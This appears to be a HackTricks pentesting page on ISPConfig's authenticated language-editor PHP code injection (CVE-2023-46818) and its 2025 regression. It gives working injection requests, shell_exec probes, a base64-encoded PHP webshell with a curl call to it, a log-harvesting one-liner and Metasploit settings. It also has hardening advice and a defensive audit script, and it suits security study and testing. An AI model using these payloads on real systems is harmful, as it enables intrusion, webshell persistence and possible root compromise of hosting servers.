ISPConfig

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Overview

ISPConfig is an open-source hosting control panel. Older 3.2.x releases shipped a language-file editor which, when enabled for the superadmin, allowed arbitrary PHP code injection through a malformed translation record. This can lead to RCE in the web server context and, depending on how PHP is executed, to privilege escalation.

Default paths to know:

  • The web root is commonly /var/www/ispconfig when served with php -S or through Apache/nginx.
  • The admin UI is exposed on an HTTP(S) vhost (sometimes bound to localhost only; use an SSH port-forward if needed).

Tip: if the panel is bound locally (for example 127.0.0.1:8080), forward it:

ssh -L 9001:127.0.0.1:8080 user@target
# then browse http://127.0.0.1:9001

Language editor PHP code injection (CVE-2023-46818)

  • Affected: ISPConfig up to 3.2.11 (fixed in 3.2.11p1)
  • Preconditions:
    • Logged in as the built-in superadmin account admin (other roles are not affected according to the vendor)
    • The language editor must be enabled: admin_allow_langedit=yes in /usr/local/ispconfig/security/security_settings.ini
  • Impact: an authenticated admin can inject arbitrary PHP that is written into a language file and executed by the application, giving RCE in the web context

References: NVD entry CVE-2023-46818 and the vendor advisory link in the References section below.

Manual exploitation flow

  1. Open/create a language file to obtain CSRF tokens

Send an initial POST to initialise the form and parse the CSRF fields (csrf_id, csrf_key) out of the HTML response. Example request path: /admin/language_edit.php.

  2. Inject PHP via records[] and save

Submit a second POST that includes the CSRF fields and a malicious translation record. Minimal command-execution probes:

POST /admin/language_edit.php HTTP/1.1
Host: 127.0.0.1:9001
Content-Type: application/x-www-form-urlencoded
Cookie: ispconfig_auth=...

lang=en&module=admin&file=messages&csrf_id=<id>&csrf_key=<key>&records[]=<?php echo shell_exec('id'); ?>

Out-of-band test (watch for ICMP):

records[]=<?php echo shell_exec('ping -c 1 10.10.14.6'); ?>

  3. Write files and drop a webshell

Use file_put_contents to create a file under a web-reachable path (for example, admin/):

records[]=<?php file_put_contents('admin/pwn.txt','owned'); ?>

Then write a simple webshell, base64-encoding it to avoid bad characters in the POST body:

records[]=<?php file_put_contents('admin/shell.php', base64_decode('PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsiY21kIl0pIDsgPz4K')); ?>

Then call the webshell:

curl 'http://127.0.0.1:9001/admin/shell.php?cmd=id'

If PHP runs as root (for example, via php -S 127.0.0.1:8080 started by root), this is immediately root RCE. Otherwise you get code execution as the web server user.

2025 regression (ISPConfig 3.3.0 / 3.3.0p1)

The language editor bug resurfaced in 3.3.0/3.3.0p1 and was fixed in 3.3.0p2. The preconditions are unchanged (admin_allow_langedit and an admin login). The same patch also addressed a monitor XSS and world-readable rotated logs.

Notes:

  • In 3.3.0/3.3.0p1, world-readable rotated logs under /usr/local/ispconfig/interface/log/ could leak authentication material if debug logging was enabled:
    find /usr/local/ispconfig/interface/log -type f -perm -004 -name '*.gz' -exec zcat {} + | head
  • The exploit steps are identical to CVE-2023-46818; 3.3.0p2 adds extra validation before language edits.

Python PoC

A ready-to-use exploit automates the token handling and payload delivery.

Example run:

python3 cve-2023-46818.py http://127.0.0.1:9001 admin <password>

Metasploit module (released July 2025)

Rapid7 added exploit/linux/http/ispconfig_lang_edit_php_code_injection, which can enable admin_allow_langedit automatically if the supplied admin account has system-config rights.

use exploit/linux/http/ispconfig_lang_edit_php_code_injection
set RHOSTS 10.10.10.50
set RPORT 8080
set USERNAME admin
set PASSWORD <admin_pass>
set TARGETURI /
run

The module writes a base64-encoded payload via records[] and triggers it, yielding a PHP Meterpreter or a custom payload.

Hardening

  • Upgrade to 3.2.11p1 or later for the original issue, and to 3.3.0p2 or later for the 2025 regression.
  • Disable the language editor unless it is strictly needed:
    admin_allow_langedit=no
  • Avoid running the panel as root; configure PHP-FPM or the web server to drop privileges
  • Enforce strong authentication for the built-in admin account
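An added audit helper covering the hardening list above and the world-readable log check from the 3.3.0 notes; it is not ISPConfig's own tooling. Assumptions not stated on the page: the installed version can be read from an `ISPC_APP_VERSION` define in /usr/local/ispconfig/interface/lib/config.inc.php, a missing admin_allow_langedit key means the editor is off, and every release after 3.3.0p2 carries the fix. The ini fragments are constructed for the offline check.

```python
#!/usr/bin/env python3
"""Audit an ISPConfig host for the language-editor RCE preconditions and leaky logs.
Added example; paths below are the ones named on the page, the version source is assumed."""
import os
import re
import stat

INI_PATH = "/usr/local/ispconfig/security/security_settings.ini"
CONFIG_PATH = "/usr/local/ispconfig/interface/lib/config.inc.php"  # assumed version source
LOG_DIR = "/usr/local/ispconfig/interface/log"

# Constructed ini fragments (the real file has more keys and sections).
SAMPLE_INI_WEAK = "[permissions]\nadmin_allow_langedit=yes\nadmin_allow_new_admin=no\n"
SAMPLE_INI_HARD = "[permissions]\nadmin_allow_langedit=no\nadmin_allow_new_admin=no\n"

VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:p(\d+))?$")


def parse_version(v: str) -> tuple:
    """'3.2.11p1' -> (3, 2, 11, 1); a release without a pN suffix gets 0 as the last field."""
    m = VERSION_RE.match(v.strip())
    if not m:
        raise ValueError(f"unrecognised ISPConfig version: {v!r}")
    return tuple(int(x or 0) for x in m.groups())


def version_is_fixed(v: str) -> bool:
    """Fixed in 3.2.11p1 (CVE-2023-46818); 3.3.0 and 3.3.0p1 regressed; 3.3.0p2 fixed again.
    Anything newer than 3.3.0p2 is assumed to keep the fix."""
    t = parse_version(v)
    if t < (3, 2, 11, 1):
        return False
    if (3, 3, 0, 0) <= t < (3, 3, 0, 2):
        return False
    return True


def langedit_enabled(ini_text: str) -> bool:
    """True when admin_allow_langedit=yes, the precondition for the language-editor bug."""
    for line in ini_text.splitlines():
        m = re.match(r"^\s*admin_allow_langedit\s*=\s*(\S+)", line)
        if m:
            return m.group(1).lower() == "yes"
    return False  # assumption: an absent key means the editor is off


def world_readable(entries) -> list:
    """entries: iterable of (path, st_mode). Returns regular files whose other-read bit
    is set, the same condition as `find -type f -perm -004` in the notes above."""
    return [p for p, mode in entries if stat.S_ISREG(mode) and mode & stat.S_IROTH]


def audit(version: str, ini_text: str, log_entries) -> list:
    """Collect findings; an empty list means all three checks passed."""
    findings = []
    if not version_is_fixed(version):
        findings.append(f"vulnerable version {version}: upgrade to 3.2.11p1+ / 3.3.0p2+")
    if langedit_enabled(ini_text):
        findings.append("admin_allow_langedit=yes: set it to no unless required")
    for p in world_readable(log_entries):
        findings.append(f"world-readable log {p}: chmod o-r (may leak credentials)")
    return findings


def read_installed_version(path: str = CONFIG_PATH) -> str:
    """Read define('ISPC_APP_VERSION', '...') from the interface config (assumed location)."""
    with open(path) as f:
        m = re.search(r"ISPC_APP_VERSION'\s*,\s*'([^']+)'", f.read())
    if not m:
        raise ValueError("ISPC_APP_VERSION not found")
    return m.group(1)


def list_log_entries(log_dir: str = LOG_DIR) -> list:
    """(path, st_mode) for every entry in the log directory; empty if it does not exist."""
    if not os.path.isdir(log_dir):
        return []
    out = []
    for name in sorted(os.listdir(log_dir)):
        p = os.path.join(log_dir, name)
        out.append((p, os.stat(p).st_mode))
    return out


if __name__ == "__main__":
    with open(INI_PATH) as f:
        ini = f.read()
    for finding in audit(read_installed_version(), ini, list_log_entries()) or ["OK"]:
        print(finding)
```

Run it as root on the panel host; each printed line maps to one bullet of the hardening list, and an `OK` means the version, editor switch and log permissions all check out.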

References
